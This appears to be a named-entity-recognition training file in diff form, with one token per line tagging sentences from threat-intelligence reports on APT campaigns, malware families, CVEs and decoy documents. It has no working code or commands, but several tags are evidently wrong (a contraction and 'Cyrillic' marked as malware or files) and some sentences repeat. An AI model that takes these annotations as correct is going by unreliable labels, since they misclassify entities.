+September B-TIME
+2016 E-TIME
+, O
+Sowbug S-APT
+infiltrated O
+an O
+organization O
+in O
+Asia S-LOC
+, O
+deploying O
+the O
+Felismus B-MAL
+backdoor E-MAL
+on O
+one O
+of O
+its O
+computers O
+, O
+Computer O
+A O
+, O
+using O
+the O
+file O
+name O
+adobecms.exe S-FILE
+in O
+CSIDL_WINDOWS\debug S-FILE
+. O
+
+Symantec S-SECTEAM
+has O
+found O
+evidence O
+of O
+Starloader B-FILE
+files E-FILE
+being O
+named O
+AdobeUpdate.exe S-FILE
+, O
+AcrobatUpdate.exe S-FILE
+, O
+and O
+INTELUPDATE.EXE S-FILE
+among O
+others O
+. O
+
+The O
+attackers O
+then O
+began O
+to O
+perform O
+reconnaissance O
+activities S-ACT
+on O
+Computer O
+A O
+via O
+cmd.exe S-FILE
+, O
+collecting O
+system-related O
+information O
+, O
+such O
+as O
+the O
+OS O
+version O
+, O
+hardware O
+configuration O
+, O
+and O
+network O
+information O
+. O
+
+In O
+September B-TIME
+2015 E-TIME
+, O
+Kaspersky B-SECTEAM
+Lab E-SECTEAM
+'s O
+Anti-Targeted O
+Attack O
+Platform O
+discovered O
+anomalous B-FILE
+network I-FILE
+traffic E-FILE
+in O
+a O
+government B-IDTY
+organization E-IDTY
+network O
+. O
+
+Symantec S-SECTEAM
+detects O
+this O
+threat O
+as O
+Backdoor.Nidiran S-FILE
+. O
+
+Attackers O
+have O
+been O
+known O
+to O
+distribute O
+malicious B-FILE
+files E-FILE
+masquerading O
+as O
+the O
+legitimate O
+iviewers.dll B-MAL
+file E-MAL
+and O
+then O
+use O
+DLL B-MAL
+load I-MAL
+hijacking E-MAL
+to O
+execute O
+the O
+malicious O
+code O
+and O
+infect O
+the O
+computer O
+. O
+
+Once O
+exploit S-VULNAME
+has O
+been O
+achieved O
+, O
+Nidiran S-MAL
+is O
+delivered O
+through O
+a O
+self-extracting B-MAL
+executable E-MAL
+that O
+extracts O
+the O
+components O
+to O
+a O
+.tmp S-FILE
+folder O
+after O
+it O
+has O
+been O
+executed O
+. O
+
+While O
+there O
+have O
+been O
+several O
+Suckfly B-ACT
+campaigns E-ACT
+that O
+infected O
+organizations O
+with O
+the O
+group O
+'s O
+custom O
+malware O
+Backdoor.Nidiran S-FILE
+, O
+the O
+Indian O
+targets O
+show O
+a O
+greater O
+amount O
+of O
+post-infection B-ACT
+activity E-ACT
+than O
+targets O
+in O
+other O
+regions O
+. O
+
+While O
+there O
+have O
+been O
+several O
+Suckfly B-ACT
+campaigns E-ACT
+that O
+infected O
+organizations O
+with O
+the O
+group O
+'s O
+custom O
+malware O
+Backdoor.Nidiran S-FILE
+, O
+the O
+Indian O
+targets O
+show O
+a O
+greater O
+amount O
+of O
+post-infection B-ACT
+activity E-ACT
+than O
+targets O
+in O
+other O
+regions O
+. O
+
+This O
+time O
+, O
+however O
+, O
+TA459 O
+opportunistically O
+used O
+spear-phishing S-ACT
+emails S-TOOL
+with O
+a O
+Microsoft B-FILE
+Word I-FILE
+attachment E-FILE
+exploiting O
+the O
+recently O
+patched O
+CVE-2017-0199 S-VULID
+to O
+deploy O
+the O
+ZeroT B-MAL
+Trojan E-MAL
+, O
+which O
+in O
+turn O
+downloaded O
+the O
+PlugX B-MAL
+Remote I-MAL
+Access I-MAL
+Trojan E-MAL
+( O
+RAT S-MAL
+) O
+. O
+
+This O
+time O
+, O
+however O
+, O
+attackers O
+opportunistically O
+used O
+spear-phishing S-ACT
+emails S-TOOL
+with O
+a O
+Microsoft B-FILE
+Word I-FILE
+attachment E-FILE
+exploiting O
+the O
+recently O
+patched O
+CVE-2017-0199 S-VULID
+to O
+deploy O
+the O
+ZeroT B-MAL
+Trojan E-MAL
+, O
+which O
+in O
+turn O
+downloaded O
+the O
+PlugX B-MAL
+Remote I-MAL
+Access I-MAL
+Trojan E-MAL
+( O
+RAT S-MAL
+) O
+. O
+
+Data O
+from O
+the O
+early O
+part O
+of O
+this O
+year O
+shows O
+that O
+the O
+Taidoor O
+attackers O
+rampantly O
+used O
+malicious.DOC S-FILE
+files O
+to O
+exploit S-VULNAME
+a O
+Microsoft S-IDTY
+Common B-TOOL
+Controls E-TOOL
+vulnerability S-VULNAME
+, O
+CVE-2012-0158 S-VULID
+. O
+
+To O
+better O
+understand O
+how O
+the O
+adversary O
+was O
+operating O
+and O
+what O
+other O
+actions O
+they O
+had O
+performed O
+, O
+CTU S-SECTEAM
+researchers O
+examined O
+cmd.exe S-FILE
+and O
+its O
+supporting O
+processes O
+to O
+uncover O
+additional O
+command O
+line O
+artifacts O
+. O
+
+In O
+a O
+separate O
+incident O
+, O
+CTU S-SECTEAM
+researchers O
+identified O
+a O
+file O
+named O
+s.txt S-FILE
+, O
+which O
+is O
+consistent O
+with O
+the O
+output O
+of O
+the O
+Netview O
+host-enumeration O
+tool O
+. O
+
+Thrip O
+was O
+attempting O
+to O
+remotely O
+install O
+a O
+previously O
+unknown O
+piece O
+of O
+malware O
+( O
+Infostealer.Catchamas S-MAL
+) O
+on O
+computers O
+within O
+the O
+victim O
+'s O
+network O
+. O
+
+Catchamas S-FILE
+is O
+a O
+custom O
+Trojan S-MAL
+designed O
+to O
+steal O
+information O
+from O
+an O
+infected O
+computer O
+and O
+contains O
+additional O
+features O
+designed O
+to O
+avoid O
+detection O
+. O
+
+The O
+malicious O
+loader O
+will O
+use O
+dynamic-link B-TOOL
+library E-TOOL
+( O
+DLL S-TOOL
+) O
+hijacking O
+— O
+injecting O
+malicious O
+code O
+into O
+a O
+process O
+of O
+a O
+file/application O
+— O
+on O
+sidebar.exe S-FILE
+and O
+launch O
+dllhost.exe S-FILE
+( O
+a O
+normal O
+file O
+) O
+. O
+
+As O
+we O
+have O
+noted O
+in O
+many O
+earlier O
+reports O
+, O
+attackers O
+commonly O
+use O
+decoy B-FILE
+files E-FILE
+to O
+trick O
+victims O
+into O
+thinking O
+a O
+malicious O
+document O
+is O
+actually O
+legitimate O
+. O
+
+The O
+documents S-FILE
+attached O
+to O
+spear-phishing S-ACT
+e-mails E-ACT
+used O
+in O
+both O
+attacks O
+contain O
+code O
+that O
+exploits O
+CVE-2012-0158 S-VULID
+, O
+which O
+despite O
+its O
+age O
+remains O
+one O
+of O
+the O
+most O
+common O
+Microsoft B-TOOL
+Word E-TOOL
+vulnerabilities S-VULNAME
+being O
+exploited O
+by O
+multiple O
+threat O
+actors O
+. O
+
+Even O
+an O
+experienced O
+user O
+can O
+be O
+fooled O
+by O
+downloading O
+a O
+malicious B-FILE
+file E-FILE
+that O
+is O
+apparently O
+from O
+adobe.com S-ACT
+, O
+since O
+the O
+URL O
+and O
+the O
+IP S-PROT
+address O
+correspond O
+to O
+Adobe O
+'s O
+legitimate O
+infrastructure O
+. O
+
+According O
+to O
+Deepen S-SECTEAM
+, O
+APT6 S-APT
+has O
+been O
+using O
+spear B-ACT
+phishing E-ACT
+in O
+tandem O
+with O
+malicious O
+PDF S-MAL
+and O
+ZIP S-MAL
+attachments O
+or O
+links O
+to O
+malware O
+infected O
+websites O
+that O
+contains O
+a O
+malicious O
+SCR B-FILE
+file E-FILE
+. O
+
+Bellingcat S-SECTEAM
+also O
+reported O
+the O
+domain O
+had O
+been O
+used O
+previously O
+to O
+host O
+potential O
+decoy B-FILE
+documents E-FILE
+as O
+detailed O
+in O
+VirusTotal S-TOOL
+here O
+using O
+http://voguextra.com/decoy.doc S-FILE
+. O
+
+We O
+identified O
+an O
+overlap O
+in O
+the O
+domain O
+voguextra.com O
+, O
+which O
+was O
+used O
+by O
+Bahamut S-APT
+within O
+their O
+" O
+Devoted B-FILE
+To I-FILE
+Humanity E-FILE
+" O
+app O
+to O
+host O
+an O
+image O
+file O
+and O
+as O
+C2 S-TOOL
+server O
+by O
+the O
+PrayTime O
+iOS O
+app O
+mentioned O
+in O
+our O
+first O
+post O
+. O
+
+While O
+not O
+detected O
+at O
+the O
+time O
+, O
+Microsoft S-IDTY
+'s O
+antivirus O
+and O
+security O
+products O
+now O
+detect O
+this O
+Barium S-APT
+malicious O
+file O
+and O
+flag O
+the O
+file O
+as O
+" O
+Win32/ShadowPad.A S-FILE
+" O
+. O
+
+MXI B-FILE
+Player E-FILE
+appears O
+to O
+be O
+a O
+version O
+of O
+the O
+Bahamut O
+agent O
+, O
+designed O
+to O
+record O
+the O
+phone O
+calls O
+and O
+collect O
+other O
+information O
+about O
+the O
+user O
+( O
+com.mxi.videoplay S-DOM
+) O
+. O
+
+Like O
+PLEAD S-ACT
+, O
+Shrouded B-ACT
+Crossbow E-ACT
+uses O
+spear-phishing S-ACT
+emails S-TOOL
+with O
+backdoor-laden O
+attachments O
+that O
+utilize O
+the O
+RTLO B-MAL
+technique E-MAL
+and O
+accompanied O
+by O
+decoy B-FILE
+documents E-FILE
+. O
+
+The O
+self-extracting B-MAL
+RAR E-MAL
+writes O
+a O
+legitimate O
+executable O
+, O
+an O
+actor-created O
+DLL S-TOOL
+called O
+Loader.dll S-FILE
+and O
+a O
+file O
+named O
+readme.txt S-FILE
+to O
+the O
+filesystem O
+and O
+then O
+executes O
+the O
+legitimate O
+executable O
+. O
+
+Leader S-MAL
+is O
+Bookworm S-MAL
+'s O
+main O
+module O
+and O
+controls O
+all O
+of O
+the O
+activities S-ACT
+of O
+the O
+Trojan S-MAL
+, O
+but O
+relies O
+on O
+the O
+additional O
+DLLs S-FILE
+to O
+provide O
+specific O
+functionality O
+. O
+
+We O
+speculate O
+that O
+other O
+attacks O
+delivering O
+Bookworm S-MAL
+were O
+also O
+targeting O
+organizations O
+in O
+Thailand S-LOC
+based O
+on O
+the O
+contents O
+of O
+the O
+associated O
+decoys B-FILE
+documents E-FILE
+, O
+as O
+well O
+as O
+several O
+of O
+the O
+dynamic B-MAL
+DNS I-MAL
+domain E-MAL
+names O
+used O
+to O
+host O
+C2 S-TOOL
+servers O
+that O
+contain O
+the O
+words O
+" O
+Thai S-LOC
+" O
+or O
+" O
+Thailand S-LOC
+" O
+. O
+
+Threat O
+actors O
+may O
+use O
+the O
+date B-FILE
+string I-FILE
+hardcoded E-FILE
+into O
+each O
+Bookworm B-MAL
+sample E-MAL
+as O
+a O
+build O
+identifier O
+. O
+
+Due O
+to O
+these O
+changes O
+without O
+a O
+new O
+date B-FILE
+string E-FILE
+, O
+we O
+believe O
+the O
+date B-FILE
+codes E-FILE
+are O
+used O
+for O
+campaign O
+tracking O
+rather O
+than O
+a O
+Bookworm S-MAL
+build O
+identifier O
+. O
+
+Another O
+decoy B-FILE
+slideshow E-FILE
+associated O
+with O
+the O
+Bookworm B-ACT
+attack I-ACT
+campaign E-ACT
+contains O
+photos O
+of O
+an O
+event O
+called O
+Bike O
+for O
+Dad O
+2015 S-TIME
+. O
+
+If O
+the O
+document O
+was O
+delivered O
+with O
+macros O
+instead O
+of O
+exploits O
+( O
+CVE-2012-0158 S-VULID
+, O
+CVE-2013-3906 S-VULID
+or O
+CVE-2014-1761 S-VULID
+) O
+, O
+then O
+the O
+document O
+contained O
+instructions O
+for O
+enabling O
+macros O
+. O
+
+The O
+executable O
+would O
+install O
+the O
+real O
+Ammyy O
+product O
+, O
+but O
+would O
+also O
+launch O
+a O
+file O
+called O
+either O
+AmmyyService.exe S-FILE
+or O
+AmmyySvc.exe S-FILE
+which O
+contained O
+the O
+malicious O
+payload O
+. O
+
+The O
+second O
+, O
+aptly O
+titled O
+" O
+kontrakt87.doc S-FILE
+" O
+, O
+copies O
+a O
+generic O
+telecommunications B-IDTY
+service E-IDTY
+contract O
+from O
+MegaFon S-IDTY
+, O
+a O
+large O
+Russian S-LOC
+mobile B-IDTY
+phone I-IDTY
+operator E-IDTY
+. O
+
+In O
+addition O
+to O
+built-in O
+functionalities O
+, O
+the O
+operators O
+of O
+Careto S-FILE
+can O
+upload O
+additional O
+modules O
+which O
+can O
+perform O
+any O
+malicious O
+task O
+. O
+
+Careto S-FILE
+'s O
+Mask B-ACT
+campaign E-ACT
+we O
+discovered O
+relies O
+on O
+spear-phishing S-ACT
+e-mails E-ACT
+with O
+links O
+to O
+a O
+malicious O
+website O
+. O
+
+Sometimes O
+, O
+the O
+attackers O
+use O
+sub-domains S-MAL
+on O
+the O
+exploit S-VULNAME
+websites O
+, O
+to O
+make O
+them O
+seem O
+more O
+legitimate O
+. O
+
+We O
+initially O
+became O
+aware O
+of O
+Careto S-FILE
+when O
+we O
+observed O
+attempts O
+to O
+exploit S-VULNAME
+a O
+vulnerability O
+in O
+our O
+products O
+to O
+make O
+the O
+malware O
+" O
+invisible O
+" O
+in O
+the O
+system O
+. O
+
+The O
+scanner O
+was O
+identified O
+as O
+the O
+Acunetix B-FILE
+Web I-FILE
+Vulnerability I-FILE
+Scanner E-FILE
+which O
+is O
+a O
+commercial O
+penetration O
+testing O
+tool O
+that O
+is O
+readily O
+available O
+as O
+a O
+14-day O
+trial O
+. O
+
+The O
+decoy B-FILE
+documents E-FILE
+dropped O
+suggest O
+that O
+the O
+targets O
+are O
+likely O
+to O
+be O
+politically S-IDTY
+or O
+militarily S-IDTY
+motivated O
+, O
+with O
+subjects O
+such O
+as O
+Intelligence O
+reports O
+and O
+political S-IDTY
+situations O
+being O
+used O
+as O
+lure O
+documents O
+. O
+
+Lately O
+, O
+Patchwork S-APT
+has O
+been O
+sending O
+multiple O
+RTF B-FILE
+files E-FILE
+exploiting O
+CVE-2017-8570 S-VULID
+. O
+
+The O
+first O
+of O
+which O
+we O
+call O
+' O
+CONFUCIUS_A S-FILE
+' O
+, O
+a O
+malware O
+family O
+that O
+has O
+links O
+to O
+a O
+series O
+of O
+attacks O
+associated O
+with O
+a O
+backdoor B-ACT
+attack E-ACT
+method O
+commonly O
+known O
+as O
+SNEEPY S-MAL
+( O
+aka O
+ByeByeShell S-MAL
+) O
+first O
+reported O
+by O
+Rapid7 S-SECTEAM
+in O
+2013 S-TIME
+. O
+
+At O
+first O
+glance O
+CONFUCIUS_B S-FILE
+looks O
+very O
+similar O
+to O
+CONFUCIUS_A S-FILE
+, O
+and O
+they O
+are O
+also O
+packaged O
+in O
+plain O
+SFX B-MAL
+binary I-MAL
+files E-MAL
+. O
+
+The O
+CONFUCIUS_B S-FILE
+executable O
+is O
+disguised O
+as O
+a O
+PowerPoint O
+presentation O
+, O
+using O
+a O
+Right-To-Left-Override S-TOOL
+( O
+RTLO S-TOOL
+) O
+trick O
+and O
+a O
+false O
+icon O
+. O
+
+We O
+also O
+believe O
+that O
+both O
+clusters O
+of O
+activity O
+have O
+links O
+to O
+attacks O
+with O
+likely O
+Indian O
+origins O
+, O
+the O
+CONFUCIUS_A B-ACT
+attacks E-ACT
+are O
+linked O
+to O
+the O
+use O
+of O
+SNEEPY/BYEBYESHELL S-MAL
+and O
+the O
+CONFUCIUS_B S-FILE
+have O
+a O
+loose O
+link O
+to O
+Hangover S-MAL
+. O
+
+The O
+two O
+malware O
+families O
+themselves O
+are O
+also O
+very O
+similar O
+, O
+and O
+therefore O
+we O
+think O
+that O
+the O
+shared O
+technique O
+is O
+an O
+indication O
+of O
+a O
+single O
+developer O
+, O
+or O
+development B-IDTY
+company E-IDTY
+, O
+behind O
+both O
+CONFUCIUS_A S-FILE
+and O
+CONFUCIUS_B S-FILE
+. O
+
+The O
+Android B-FILE
+version E-FILE
+, O
+for O
+instance O
+, O
+can O
+steal O
+SMS O
+messages O
+, O
+accounts O
+, O
+contacts O
+, O
+and O
+files O
+, O
+as O
+well O
+as O
+record O
+audio O
+. O
+
+The O
+documents O
+that O
+exploit S-VULNAME
+CVE2017-11882 S-VULID
+download O
+another O
+payload O
+— O
+an O
+HTML B-TOOL
+Application E-TOOL
+( O
+HTA S-TOOL
+) O
+file O
+toting O
+a O
+malicious O
+Visual B-TOOL
+Basic E-TOOL
+( O
+VBS S-TOOL
+) O
+script O
+— O
+from O
+the O
+server O
+, O
+which O
+is O
+executed O
+accordingly O
+by O
+the O
+command-line O
+tool O
+mshta.exe S-FILE
+. O
+
+According O
+to O
+our O
+statistics O
+, O
+as O
+of O
+the O
+beginning O
+of O
+2015 S-TIME
+this O
+botnet B-FILE
+encompassed E-FILE
+over O
+250 O
+000 O
+infected O
+devices O
+worldwide O
+including O
+infecting O
+more O
+than O
+100 O
+financial B-IDTY
+institutions E-IDTY
+with O
+80% O
+of O
+them O
+from O
+the O
+top O
+20 O
+list O
+. O
+
+If O
+a O
+bot S-FILE
+was O
+installed O
+on O
+a O
+network O
+that O
+was O
+of O
+interest O
+to O
+the O
+hacking O
+group O
+, O
+this O
+bot O
+was O
+then O
+used O
+to O
+upload O
+one O
+of O
+the O
+remote O
+access O
+programs O
+. O
+
+At O
+first O
+look O
+, O
+it O
+pretends O
+to O
+be O
+a O
+Java B-MAL
+related I-MAL
+application E-MAL
+but O
+after O
+a O
+quick O
+analysis O
+, O
+it O
+was O
+obvious O
+this O
+was O
+something O
+more O
+than O
+just O
+a O
+simple O
+Java B-FILE
+file E-FILE
+. O
+
+Contextually O
+relevant O
+emails S-TOOL
+are O
+sent O
+to O
+specific O
+targets O
+with O
+attached O
+documents S-FILE
+that O
+are O
+packed O
+with O
+exploit S-VULNAME
+code O
+and O
+Trojan S-MAL
+horse O
+programmes O
+designed O
+to O
+take O
+advantage O
+of O
+vulnerabilities O
+in O
+software O
+installed O
+on O
+the O
+target O
+'s O
+computer O
+. O
+
+The O
+authors O
+of O
+that O
+report O
+identify O
+three O
+primary O
+tools O
+used O
+in O
+the O
+campaigns S-ACT
+attributed O
+to O
+Hidden O
+Lynx O
+: O
+Trojan.Naid S-MAL
+, O
+Backdoor.Moudoor S-FILE
+, O
+and O
+Backdoor.Hikit S-MAL
+. O
+
+The O
+above O
+network O
+shows O
+relationships O
+between O
+three O
+tools O
+used O
+by O
+Hidden O
+Lynx O
+during O
+its O
+VOHO B-ACT
+campaign E-ACT
+: O
+Trojan.Naid S-MAL
+, O
+Backdoor.Moudoor S-FILE
+, O
+and O
+Backdoor.Hikit S-MAL
+. O
+
+Symantec S-SECTEAM
+during O
+2012 S-TIME
+linked O
+the O
+Elderwood B-ACT
+Project E-ACT
+to O
+Operation B-ACT
+Aurora E-ACT
+; O
+Trojan.Naid S-MAL
+and O
+Backdoor.Moudoor S-FILE
+were O
+also O
+used O
+in O
+Aurora S-MAL
+, O
+by O
+the O
+Elderwood B-APT
+Gang E-APT
+, O
+and O
+by O
+Hidden B-APT
+Lynx E-APT
+. O
+
+One O
+e-mail S-TOOL
+carried O
+a O
+Microsoft B-TOOL
+PowerPoint E-TOOL
+file O
+named O
+" O
+thanks.pps S-FILE
+" O
+( O
+VirusTotal S-TOOL
+) O
+, O
+the O
+other O
+a O
+Microsoft B-TOOL
+Word E-TOOL
+document O
+named O
+" O
+request.docx S-FILE
+" O
+. O
+
+Around O
+the O
+same O
+time O
+, O
+WildFire S-SECTEAM
+also O
+captured O
+an O
+e-mail S-TOOL
+containing O
+a O
+Word S-TOOL
+document O
+( O
+" O
+hello.docx S-FILE
+" O
+) O
+with O
+an O
+identical O
+hash O
+as O
+the O
+earlier O
+Word S-TOOL
+document O
+, O
+this O
+time O
+sent O
+to O
+a O
+U.S. S-LOC
+Government S-IDTY
+recipient O
+. O
+
+The O
+initially-observed O
+" O
+thanks.pps S-FILE
+" O
+example O
+tricks O
+the O
+user O
+into O
+running O
+the O
+embedded O
+file O
+named O
+ins8376.exe S-FILE
+which O
+loads O
+a O
+payload O
+DLL S-TOOL
+named O
+mpro324.dll S-FILE
+. O
+
+In O
+this O
+case O
+, O
+the O
+file O
+used O
+the O
+software O
+name O
+" O
+Cyberlink S-FILE
+" O
+, O
+and O
+a O
+description O
+of O
+" O
+CLMediaLibrary O
+Dynamic B-TOOL
+Link I-TOOL
+Library E-TOOL
+" O
+and O
+listing O
+version O
+4.19.9.98 O
+. O
+
+This O
+next O
+stage O
+library O
+copies O
+itself O
+into O
+the O
+System32 O
+directory O
+of O
+the O
+Windows S-OS
+folder O
+after O
+the O
+hardcoded O
+file O
+name O
+— O
+either O
+KBDLV2.DLL S-FILE
+or O
+AUTO.DLL S-FILE
+, O
+depending O
+on O
+the O
+malware O
+sample O
+. O
+
+Once O
+BARIUM S-ACT
+has O
+established O
+rapport O
+, O
+they O
+spear-phish S-ACT
+the O
+victim O
+using O
+a O
+variety O
+of O
+unsophisticated S-MAL
+malware S-MAL
+installation O
+vectors O
+, O
+including O
+malicious B-MAL
+shortcut E-MAL
+( O
+.lnk S-FILE
+) O
+files O
+with O
+hidden O
+payloads O
+, O
+compiled O
+HTML B-MAL
+help I-MAL
+( I-MAL
+.chm I-MAL
+) I-MAL
+files E-MAL
+, O
+or O
+Microsoft B-MAL
+Office I-MAL
+documents E-MAL
+containing O
+macros O
+or O
+exploits O
+. O
+
+This O
+was O
+the O
+case O
+in O
+two O
+known O
+intrusions O
+in O
+2015 S-TIME
+, O
+where O
+attackers O
+named O
+the O
+implant O
+DLL S-TOOL
+" O
+ASPNET_FILTER.DLL S-FILE
+" O
+to O
+disguise O
+it O
+as O
+the O
+DLL S-TOOL
+for O
+the O
+ASP.NET B-FILE
+ISAPI I-FILE
+Filter E-FILE
+. O
+
+In O
+early O
+2016 S-TIME
+the O
+Callisto O
+Group O
+began O
+sending O
+highly O
+targeted O
+spear B-ACT
+phishing E-ACT
+emails S-TOOL
+with O
+malicious B-FILE
+attachments E-FILE
+that O
+contained O
+, O
+as O
+their O
+final O
+payload O
+, O
+the O
+" O
+Scout S-MAL
+" O
+malware O
+tool O
+from O
+the O
+HackingTeam O
+RCS O
+Galileo O
+platform O
+. O
+
+The O
+malicious B-FILE
+attachments E-FILE
+purported O
+to O
+be O
+invitations S-MAL
+or O
+drafts B-MAL
+of I-MAL
+the I-MAL
+agenda E-MAL
+for O
+the O
+conference O
+. O
+
+We O
+encountered O
+the O
+first O
+document O
+exploit S-VULNAME
+called O
+" O
+THAM B-FILE
+luan I-FILE
+- I-FILE
+GD I-FILE
+- E-FILE
+NCKH2.doc S-FILE
+" O
+a O
+few O
+days O
+ago O
+, O
+which O
+appears O
+to O
+be O
+leveraging O
+some O
+vulnerabilities O
+patched O
+with O
+MS12-060 S-MAL
+. O
+
+This O
+document O
+, O
+written O
+in O
+Vietnamese O
+, O
+appears O
+to O
+be O
+reviewing O
+and O
+discussing O
+best O
+practices O
+for O
+teaching O
+and O
+researching O
+scientific O
+topics O
+. O
+
+Examples O
+as O
+early O
+as O
+2008 S-TIME
+document B-FILE
+malware E-FILE
+operations O
+against O
+Tibetan B-IDTY
+non-governmental I-IDTY
+organizations E-IDTY
+( O
+NGOs S-IDTY
+) O
+that O
+also O
+targeted O
+Falun B-IDTY
+Gong E-IDTY
+and O
+Uyghur B-IDTY
+groups E-IDTY
+. O
+
+There O
+is O
+the O
+exploit B-FILE
+code E-FILE
+and O
+malware O
+used O
+to O
+gain O
+access O
+to O
+systems O
+, O
+the O
+infrastructure O
+that O
+provides O
+command O
+and O
+control O
+to O
+the O
+malware O
+operator O
+, O
+and O
+the O
+human O
+elements O
+– O
+developers O
+who O
+create O
+the O
+malware O
+, O
+operators O
+who O
+deploy O
+it O
+, O
+and O
+analysts O
+who O
+extract O
+value O
+from O
+the O
+stolen O
+information O
+. O
+
+The O
+operation O
+against O
+the O
+Tibetan B-IDTY
+Parliamentarians E-IDTY
+illustrates O
+the O
+continued O
+use O
+of O
+malicious B-FILE
+attachments E-FILE
+in O
+the O
+form O
+of O
+documents B-MAL
+bearing I-MAL
+exploits E-MAL
+. O
+
+The O
+first O
+attack O
+started O
+in O
+early O
+July S-TIME
+with O
+a O
+ShimRatReporter S-FILE
+payload O
+. O
+
+In O
+their O
+Operation B-ACT
+Tropic I-ACT
+Trooper E-ACT
+report O
+, O
+Trend B-SECTEAM
+Micro E-SECTEAM
+documented O
+the O
+behaviour O
+and O
+functionality O
+of O
+an O
+espionage B-FILE
+toolkit E-FILE
+with O
+several O
+design O
+similarities O
+to O
+those O
+observed O
+in O
+the O
+various O
+components O
+of O
+KeyBoy S-MAL
+. O
+
+The O
+exploit B-FILE
+document E-FILE
+carrying O
+this O
+alternate O
+KeyBoy S-MAL
+configuration O
+also O
+used O
+a O
+decoy B-FILE
+document E-FILE
+which O
+was O
+displayed O
+to O
+the O
+user O
+after O
+the O
+exploit S-VULNAME
+launched O
+. O
+
+This O
+technique O
+hides O
+the O
+true O
+C2 S-TOOL
+server O
+from O
+researchers O
+that O
+do O
+not O
+have O
+access O
+to O
+both O
+the O
+rastls.dll S-FILE
+and O
+Sycmentec.config B-FILE
+files E-FILE
+. O
+
+This O
+file O
+requires O
+the O
+target O
+to O
+attempt O
+to O
+open O
+the O
+.lnk B-FILE
+file E-FILE
+, O
+which O
+redirects O
+the O
+user O
+to O
+a O
+Windows S-OS
+Scripting O
+Component O
+( O
+.wsc S-FILE
+) O
+file O
+, O
+hosted O
+on O
+an O
+adversary-controlled O
+microblogging O
+page O
+. O
+
+Upon O
+successful O
+exploitation O
+, O
+the O
+attachment S-FILE
+will O
+install O
+the O
+Trojan S-MAL
+known O
+as O
+NetTraveler S-MAL
+using O
+a O
+DLL B-FILE
+side-loading E-FILE
+attack O
+technique O
+. O
+
+Kaspersky B-SECTEAM
+Lab E-SECTEAM
+'s O
+products O
+detect O
+the O
+Microsoft B-IDTY
+Office E-IDTY
+exploits S-VULNAME
+used O
+in O
+the O
+spear-phishing S-ACT
+attacks E-ACT
+, O
+including O
+Exploit.MSWord.CVE-2010-333 S-FILE
+, O
+Exploit.Win32.CVE-2012-0158 S-FILE
+. O
+
+The O
+files S-FILE
+exploit S-VULNAME
+the O
+well-known O
+Microsoft B-TOOL
+Office E-TOOL
+vulnerability O
+, O
+CVE-2012-0158 S-VULID
+, O
+to O
+execute O
+malicious O
+code O
+in O
+order O
+to O
+take O
+control O
+of O
+the O
+targeted O
+systems O
+. O
+
+We O
+also O
+discovered O
+an O
+interesting O
+piece O
+of O
+rare O
+malware S-MAL
+created O
+by O
+this O
+threat O
+actor O
+– O
+a O
+Bluetooth B-FILE
+device I-FILE
+harvester E-FILE
+. O
+
+For O
+example O
+, O
+Bisonal B-APT
+malware E-APT
+in O
+2012 S-TIME
+used O
+send() O
+and O
+recv() O
+APIs O
+to O
+communicate O
+with O
+its O
+C2. O
+This O
+Bisonal S-FILE
+variant O
+used O
+in O
+the O
+latest O
+attack O
+communicates O
+with O
+one O
+of O
+the O
+following O
+hard-coded O
+C2 S-TOOL
+addresses O
+by O
+using O
+the O
+HTTP B-ACT
+POST E-ACT
+method O
+on O
+TCP S-PROT
+PROT O
+443 O
+. O
+
+Previous O
+reports O
+have O
+discussed O
+Bisonal B-FILE
+malware E-FILE
+used O
+in O
+attacks O
+against O
+Japan S-LOC
+, O
+South B-LOC
+Korea E-LOC
+and O
+Russia S-LOC
+. O
+
+This O
+particular O
+sample S-FILE
+we O
+found O
+targeted O
+an O
+organization O
+in O
+Russia S-LOC
+and O
+there O
+is O
+a O
+specific O
+system O
+language O
+check O
+for O
+Cyrillic O
+and O
+no O
+others O
+. O
+
+If O
+it's S-FILE
+Cyrillic S-MAL
+and O
+the O
+command O
+to O
+the O
+shell O
+is O
+not O
+‘ipconfig’ O
+, O
+the O
+threat O
+converts O
+the O
+command O
+result O
+text O
+encoding O
+from O
+Cyrillic O
+to O
+UTF-16 S-MAL
+. O
+
+Similar O
+to O
+the O
+Bisonal S-FILE
+variant O
+targeting O
+the O
+Russian B-LOC
+organization E-LOC
+, O
+this O
+sample O
+was O
+also O
+disguised O
+as O
+PDF S-TOOL
+document O
+. O
+
+The O
+contents O
+of O
+the B-FILE
+decoy I-FILE
+PDF E-FILE
+is O
+a O
+job O
+descriptions O
+with O
+the O
+South B-LOC
+Korean E-LOC
+Coast B-IDTY
+Guard E-IDTY
+. O
+
+The O
+installed B-FILE
+EXE I-FILE
+file E-FILE
+is O
+almost O
+exactly O
+the O
+same O
+as O
+the O
+DLL S-TOOL
+version O
+of O
+Bisonal B-FILE
+variant E-FILE
+used O
+against O
+the O
+Russian S-LOC
+organization O
+. O
+
+ined O
+in O
+the O
+archive O
+is O
+called O
+DriverInstallerU.exe” S-FILE
+but O
+its O
+metadata O
+shows O
+that O
+its O
+original O
+name O
+is O
+Interenet B-FILE
+Assistant.exe” E-FILE
+. O
+
+In O
+this O
+sample O
+, O
+however O
+, O
+the O
+module O
+names O
+were O
+changed O
+from O
+actors O
+and O
+characters’ O
+names O
+to O
+car O
+models O
+, O
+namely O
+BMW_x1” S-FILE
+, O
+BMW_x2” S-FILE
+and O
+up O
+to O
+BMW_x8” S-FILE
+. O
+
+wuaupdt.exe S-FILE
+is O
+a O
+CMD B-MAL
+backdoor E-MAL
+, O
+which O
+can O
+receive O
+and O
+execute O
+CMD O
+commands O
+sent O
+from O
+C2 S-TOOL
+. O
+
+Furthermore O
+, O
+it O
+has O
+similar O
+code O
+logic O
+as O
+previous O
+ones O
+wuaupdt.exe S-FILE
+in O
+this O
+attack O
+appears O
+in O
+previous O
+Donot O
+attack O
+, O
+and O
+C2 S-TOOL
+addresses O
+are O
+same O
+to O
+previous O
+ones O
+. O
+
+Other O
+open O
+source O
+and O
+semi-legitimate O
+pen-testing O
+tools O
+like O
+nbtscan S-FILE
+and O
+powercat S-FILE
+are O
+being O
+used O
+for O
+mapping O
+available O
+resources O
+and O
+lateral O
+movement O
+as O
+well O
+. O
+
+As O
+described O
+in O
+the O
+infection O
+flow O
+, O
+one O
+of O
+the O
+first O
+uses O
+of O
+the O
+AutoHotKey B-FILE
+scripts E-FILE
+is O
+to O
+upload O
+a O
+screenshot O
+from O
+the O
+compromised O
+PC O
+. O
+
+Throughout O
+our O
+investigation O
+, O
+we O
+have O
+found O
+evidence O
+that O
+shows O
+operational O
+similarities O
+between O
+this O
+implant S-FILE
+and O
+Gamaredon S-APT
